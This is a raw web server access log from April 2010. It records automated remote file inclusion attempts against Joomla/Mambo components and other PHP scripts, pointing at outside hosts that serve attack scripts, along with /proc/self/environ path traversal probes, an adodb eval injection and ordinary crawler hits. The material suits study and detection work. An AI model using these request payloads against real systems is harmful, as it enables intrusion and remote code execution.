93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /logs/access_log.1220054400/errors.php?error=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /logs/errors.php?error=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:24:13 -0500] "GET /errors.php?error=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
87.250.255.243 - - [21/Apr/2010:07:25:11 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
122.201.100.182 - - [21/Apr/2010:07:26:24 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:26:24 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:26:38 -0500] "GET /logs/access_log.1219708800//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:27:02 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:27:04 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:27:04 -0500] "GET /logs/access_log.1219708800//include/print_category.php?setup[use_category]=1&dir=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:27:42 -0500] "GET /logs/access_log.1210204800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr/%3E%3Cspanclass=%22green//components/com_simpleboard/image_upload.php?sbp=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr//components/com_simpleboard/image_upload.php?sbp=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr/%3E%3Cspanclass=%22green//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr/%3E%3Cspanclass=%22green//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:43 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:44 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr/%3E%3Cspanclass=%22green/errors.php?error=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
93.90.185.234 - - [21/Apr/2010:07:29:44 -0500] "GET /logs/access_log.1220054400%22onmouseover=%22window.status='tomdolan.pconline.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.1220054400%3C/a%3E%3Cbr/%3E...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...http:/monicaperalta.com.ar/principal/components/com_simpleboard/README?...%3Cbr/errors.php?error=http://www.3four2.com.au//cmdstate.txt??? HTTP/1.1" 404 547 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
87.250.255.243 - - [21/Apr/2010:07:30:13 -0500] "GET /logs/access_log.1251331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
202.72.242.242 - - [21/Apr/2010:07:32:08 -0500] "GET //?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
202.72.242.242 - - [21/Apr/2010:07:32:08 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
202.72.242.242 - - [21/Apr/2010:07:32:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
207.46.204.194 - - [21/Apr/2010:07:32:27 -0500] "GET /logs/access_log.1267056000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:07:32:47 -0500] "GET /logs/access_log.1207440000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
202.72.242.242 - - [21/Apr/2010:07:32:47 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
202.72.242.242 - - [21/Apr/2010:07:32:47 -0500] "GET //?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
202.72.242.242 - - [21/Apr/2010:07:32:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:33:18 -0500] "GET //ashnews.php?pathtoashnews=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:33:18 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:33:18 -0500] "GET /logs/access_log.1225929600//ashnews.php?pathtoashnews=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.13.97 - - [21/Apr/2010:07:34:27 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.22.207.181 - - [21/Apr/2010:07:34:40 -0500] "GET /logs/access_log.1219363200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:34:40 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.22.207.181 - - [21/Apr/2010:07:34:40 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:35:17 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [21/Apr/2010:07:36:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [21/Apr/2010:07:36:32 -0500] "GET /logs/access_log.1194652800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
193.239.12.73 - - [21/Apr/2010:07:38:48 -0500] "GET //index.php?option=com_simpleboard&func=view&catid=http://200.21.184.243/appserv/id1.gif??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
193.239.12.73 - - [21/Apr/2010:07:38:48 -0500] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://200.21.184.243/appserv/id1.gif??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.239.12.73 - - [21/Apr/2010:07:38:48 -0500] "GET /logs/access_log.1271030400//index.php?option=com_simpleboard&func=view&catid=http://200.21.184.243/appserv/id1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:39:03 -0500] "GET /logs/access_log.1267315200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.22.207.181 - - [21/Apr/2010:07:39:09 -0500] "GET /logs/access_log.1220054400/components/com_simpleboard/image_upload.php?sbp=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:07:39:40 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
86.121.154.56 - - [21/Apr/2010:07:40:27 -0500] "GET /logs/template.php?content=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
86.121.154.56 - - [21/Apr/2010:07:40:27 -0500] "GET /logs/access_log.1270598400/template.php?content=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
86.121.154.56 - - [21/Apr/2010:07:40:27 -0500] "GET /template.php?content=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
195.190.166.35 - - [21/Apr/2010:07:40:39 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:40:56 -0500] "GET /logs/access_log.1258934400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
202.72.242.242 - - [21/Apr/2010:07:41:06 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
202.72.242.242 - - [21/Apr/2010:07:42:16 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:42:50 -0500] "GET /logs/access_log.1165190400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.107.181 - - [21/Apr/2010:07:43:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.42 - - [21/Apr/2010:07:45:27 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.201.100.182 - - [21/Apr/2010:07:45:44 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:45:44 -0500] "GET //?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:45:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 200 2588 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:45:58 -0500] "GET /logs/access_log.1266883200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
163.24.136.10 - - [21/Apr/2010:07:46:18 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:47:13 -0500] "GET /logs/access_log.1268784000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.190.166.35 - - [21/Apr/2010:07:47:44 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:52 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:52 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:52 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:53 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:53 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:48:53 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:49:06 -0500] "GET /logs/access_log.1179014400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [21/Apr/2010:07:49:15 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:15 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:15 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:24 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:45 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:45 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:45 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [21/Apr/2010:07:49:50 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:50:45 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.216.43.133 - - [21/Apr/2010:07:50:46 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:52:16 -0500] "GET /logs/access_log.1258502400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.239 - - [21/Apr/2010:07:52:24 -0500] "GET /logs/access_log.1262995200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.39 - - [21/Apr/2010:07:52:26 -0500] "GET /logs/access_log.1248566400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.146.194.66 - - [21/Apr/2010:07:52:58 -0500] "GET /logs/access_log.1224460800/xmlrpc.php? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.146.194.66 - - [21/Apr/2010:07:52:59 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.146.194.66 - - [21/Apr/2010:07:52:59 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.146.194.66 - - [21/Apr/2010:07:53:07 -0500] "GET /logs/access_log.1224460800/xmlrpc.php? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.146.194.66 - - [21/Apr/2010:07:53:07 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.146.194.66 - - [21/Apr/2010:07:53:07 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.25.141.101 - - [21/Apr/2010:07:53:23 -0500] "GET /phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
85.25.141.101 - - [21/Apr/2010:07:53:23 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.25.141.101 - - [21/Apr/2010:07:53:23 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.214.161.203 - - [21/Apr/2010:07:53:55 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www.cerep.co.kr/ver1/ajim1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [21/Apr/2010:07:54:05 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.254.228.21 - - [21/Apr/2010:07:54:05 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [21/Apr/2010:07:54:05 -0500] "GET /logs/access_log.1237334400//inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:54:09 -0500] "GET /logs/access_log.1160524800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.254.228.21 - - [21/Apr/2010:07:55:11 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [21/Apr/2010:07:55:12 -0500] "GET /logs/access_log.1236297600//inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.254.228.21 - - [21/Apr/2010:07:55:12 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:55:32 -0500] "GET /logs/access_log.1215734400//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:07:55:51 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:07:55:51 -0500] "GET /phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:07:55:51 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:56:39 -0500] "GET /logs/access_log.1207612800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [21/Apr/2010:07:56:54 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
122.201.100.182 - - [21/Apr/2010:07:56:56 -0500] "GET /logs/access_log.1215648000//?path%5Bdocroot%5D=http://www.rittsound.com//modules/copyme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.72.194.58 - - [21/Apr/2010:07:58:54 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:07:59:47 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:08:02:55 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [21/Apr/2010:08:03:06 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.25.141.101 - - [21/Apr/2010:08:04:03 -0500] "GET /logs/access_log.1220054400/phphtml.php?htmlclass_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:08:05:25 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.16.18.219 - - [21/Apr/2010:08:06:20 -0500] "GET /logs/i.social.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:08:06:20 -0500] "GET /i.social.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.16.18.219 - - [21/Apr/2010:08:06:20 -0500] "GET /logs/access_log.1244073600/i.social.php?show=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
